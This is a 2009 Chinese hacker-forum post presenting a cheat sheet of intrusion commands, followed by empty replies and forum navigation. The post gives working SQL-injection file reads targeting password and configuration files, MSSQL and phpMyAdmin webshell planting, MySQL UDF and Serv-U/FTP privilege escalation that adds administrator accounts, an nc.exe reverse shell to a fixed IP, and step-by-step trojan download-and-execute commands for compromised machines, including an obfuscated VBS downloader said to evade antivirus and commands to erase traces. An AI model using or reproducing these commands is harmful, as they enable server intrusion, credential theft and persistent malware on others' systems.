一些常用的入侵命令
Posted on一些常用的入侵命令 - 【黑客资料】
孤风月影 (少年IT精英)**当前离线
正式版主
帖子1385 积分693 威望0 个 金币7207 个 宣传3 个 注册时间2008-1-22 最后登录2009-10-26 1楼
字体大小: tT
发表于 2009-10-15 17:05 | 只看该作者
[资料] 一些常用的入侵命令
load_file()读取文件 ————————————————————————————————— MYSQL注入中,load_file()函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件,如: /usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件 /usr/local/apache2/conf/httpd.conf /usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置 /usr/local/app/php5/lib/php.ini //PHP相关设置 /etc/sysconfig/iptables //从中得到防火墙规则策略 /etc/httpd/conf/httpd.conf // apache配置文件 /etc/rsyncd.conf //同步程序配置文件 /etc/sysconfig/network-scripts/ifcfg-eth0 //查看IP. /etc/my.cnf //mysql的配置文件 /etc/redhat-release //系统版本 /etc/issue /etc/issue.net c:\mysql\data\mysql\user.MYD //存储了mysql.user表中的数据库连接密码 c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //存储了虚拟主机网站路径和密码 c:\Program Files\Serv-U\ServUDaemon.ini c:\windows\my.ini //MYSQL配置文件 c:\windows\system32\inetsrv\MetaBase.xml //IIS配置文件 等等。实际上,load_file()的作用不止于此,它还可以用来读取系统中的二进制文件, c:\windows\repair\sam //存储了WINDOWS系统初次安装的密码 c:\Program Files\ Serv-U\ServUAdmin.exe //6.0版本以前的serv-u管理员密码存储于此 c:\Program Files\RhinoSoft.com\ServUDaemon.exe C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\/.cif文件 //存储了pcAnywhere的登陆密码 ———————————————————————————————————————————————— mssql差异备份webshell 1.备份数据 backup database 库名 to disk = 'c:\windows\char.bak';-- 2.创建表并插曲入数据 create table [dbo].[dtest] ([cmd] [image]); insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);-- 3.进行差异备份 backup database 库名 to disk='目标位置\char.asp' WITH DIFFERENTIAL,FORMAT;-- ————————————————————————————————————————————————— phpmyadmin插马 create table a (hack text not null); insert into a (hack) values ('<?php system($_REQUEST[cmd]);?>'); select hack from a into outfile 'D:/php/www/hack.php'; drop table a; phpmyadmin/libraries/select_lang.lib.php http://bbs.hackerxfiles.net/goto.php?url=aHR0cDovL3d3dy5oeGhhY2suY29tL2Jicy9pbmRleC5waHA= ————————————————————————————————————————————————— mysql提权 create function cmdshell returns string soname 'udf.dll' select cmdshell('net user 99990110 17216329 /add'); select cmdshell('net localgroup administrators 99990110 /add'); drop function cmdshell; ————————————————————————————————————————————————— serv-u修改权限配置 User9=Kindle|1|0 [USER=Kindle|1] Password=mg5D3A393510FB2F0C04FAA8211509296F 密码:17126329 HomeDir=c:\ RelPaths=1 PasswordLastChange=1239006396 TimeOut=600 Maintenance=System Access1=C:|RWAMELCDP ————————————————————————————————————————————————— ftp提权 quote site exec net.exe user Kindle$ 17216329 /add quote site exec net.exe localgroup administrators Kindle$ /add regedit /e "C:\Documents and Settings\All Users\Documents\system.ini" "HKEY_LOCAL_MACHINE\SOFTWARE\cat soft\serv-u\" 导入注册表是/s ————————————————————————————————————————————————— mysql爆表注射 SCHEMA_NAME information_schema.SCHEMATA TABLE_NAME information_schema.TABLES where TABLE_SCHEMA=... COLUMN_NAME information_schema.COLUMNS where TABLE_NAME=... —————————————————————————————————————————————————— cookie注射语句 javascript:alert(document.cookie="id="+escape("406 and 1=1")); —————————————————————————————————————————————————— 系统网马后门 copy 1.jpg \.\c:\com1.asp nc.exe -vv 203.171.230.200 111 -e C:\Downloads\cmd.exe dir /b /d /s /.exe>c:\1.txt 123';exec master..xp_cmdshell'net user 213 123 /add';-- javascript:lbtnUpload.click(); —————————————————————————————————————————————————— 命令行下载、运行木马 下文说一下搞定了肉鸡,如何保持长久上线,防止动态ip或者域名变化导致找不到肉鸡。 这需要种植木马,且这个木马要能够往外面咱们自己的服务器或者邮箱等报告自己的运行状态。 如何下载木马并种植到肉鸡上面的问题,其实网上也有零散的,我这儿算是整理,同时加上自己的体会。大家还是多实践,多搞搞肉鸡(最好练习命令行,3389登陆上去一对记录,如被追踪很危险的。其实我更相信,图形界面下能操作的,命令行都能操作正如windows下能搞的,linux下都能做到)这儿命令行可以是ms sql1433得到的xp_cmdshell等。 木马下载无非是ftp跟http的网页下载两种方式,这儿分别介绍: 1.ftp下载 这儿是使用肉鸡system32目录下的ftp.exe来访问我们放置木马的ftp服务。 显然要解决输入帐号密码的问题,同时要制定命令让远程的ftp.exe执行,从而下载文件。还好,这些都可以通过命令来解决。 假设木马文件在服务器ftpxx.3322.org下,帐号为ftpxx,密码为3322,文件为mm.exe。
通过命令行
echo ftpxxx>ftp.txt echo 3322>>ftp.txt echo get mm.exe>>ftp.txt echo bye>>ftp.txt
ftp -s:ftp.txt ftpxx.3322.org
则根据前一篇文章的&用法,也可以用一句命令完成: echo ftpxxx>ftp.txt & echo 3322>>ftp.txt & echo get mm.exe>>ftp.txt & echo bye>>ftp.txt & ftp -s:ftp.txt ftpxx.3322.org 这样就下载成功了。 下一步是执行木马并删除记录: 也就是一句话(三个语句): mm.exe & del ftp.txt & del mm.exe 2.html下载 这儿是使用肉鸡system32目录下的wscript.exe来执行指定的vbs脚本访问我们放置木马的http服务器。 假设木马地址为:http://bbs.hackerxfiles.net/goto.php?url=aHR0cDovL2Z0cHh4LjMzMjIub3JnL21tLmV4ZQ== mm.exe 通过命令行(无需任何修改,我已做免杀,除非被杀了,可以修改脚本) ========================== @echo with wscript:if .arguments.count^<2-0+0-0+0 then .quit:end if > thisis.vbs @echo set aso=.createobject("adodb.stream"):set thisisweb=createobject("mi"+"cr"+"o"+"s"+"o"+"ft.x"+"ml"+"h"+"ttp") >> thisis.vbs @echo thisisweb.open "g"+"e"+"t",.arguments(0),0:thisisweb.send:if thisisweb.status^>200 then .echo "E"+"r"+"r"+"o"+"r"+":"+thisisweb.status:.quit>> thisis.vbs @echo aso.type=1-0+0-0+0:aso.open:aso.write thisisweb.responsebody:aso.savetofile .arguments(1-0+0-0+0),2-0+0-0+0:end with >> thisis.vbs Type thisis.vbs ======================== 下一步是执行木马并删除记录: 也就是一句话(三个语句): cscript thisis.vbs http://bbs.hackerxfiles.net/goto.php?url=aHR0cDovL2Z0cHh4LjMzMjIub3JnL21tLmV4ZQ== mm.exe & del thisis.vbs & del mm.exe 或者简单的方法是(会弹出网页!): START its:http://bbs.hackerxfiles.net/goto.php?url=aHR0cDovL2Z0cHh4LjMzMjIub3JnL21tLmV4ZQ== 下载后, DIR /A /S "C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\/*.EXE" 列出路径后,执行。 这儿帐号Default User也可能是当前用户 收藏 分享 评分 我的baidu空间
561726469 当前离线
一年级
帖子369 积分185 威望0 个 金币679 个 宣传1 个 注册时间2009-1-17 最后登录2009-10-25 2楼
发表于 2009-10-15 18:46 | 只看该作者
ywxiaozi 当前离线
学前班
帖子22 积分11 威望0 个 金币34 个 宣传3 个 注册时间2009-8-1 最后登录2009-10-18 3楼
发表于 2009-10-18 14:36 | 只看该作者
kfchina 当前离线
学前班
帖子23 积分12 威望0 个 金币53 个 宣传0 个 注册时间2009-9-30 最后登录2009-10-19 4楼
发表于 2009-10-19 22:50 | 只看该作者
zkl_1987 当前离线
一年级
帖子104 积分52 威望0 个 金币296 个 宣传1 个 注册时间2009-10-23 最后登录2009-10-28 5楼
发表于 昨天 10:42 | 只看该作者
lxjlxj8 当前在线
学前班
帖子2 积分1 威望0 个 金币85 个 宣传0 个 注册时间2007-2-9 最后登录2009-10-28 6楼
发表于 2 小时前 | 只看该作者
- 【新生报到】
- 【原创发布】
- 【骇客新闻】 杂志相关
- 【新书发布】
- 【杂志事务】
- 【稿费样刊】
- 【杂志工具】 技术讨论
- 【小菜举手】
- 【攻防技术】
- 【编程魔方】
- 【毒木成林】 资料发布
- 【资料审核】
- 【QQ 攻防】
- 【农具店铺】
- 【动画教程】
- 【黑客资料】
- 【资源共享】 休闲娱乐
- 【寂寞梧桐】
- 【笔墨江湖】
- 【影音梧桐】 论坛站务
- 【官方公告】
- 【申请意见】
京ICP备05044370号|Archiver|SiteMap |WAP|
GMT+8, 2009-10-28 11:17, Processed in 0.020896 second(s), 4 queries, Gzip enabled.
Powered by Discuz! 7.0.0 © 2001-2009
Designed by 54Abu.Cn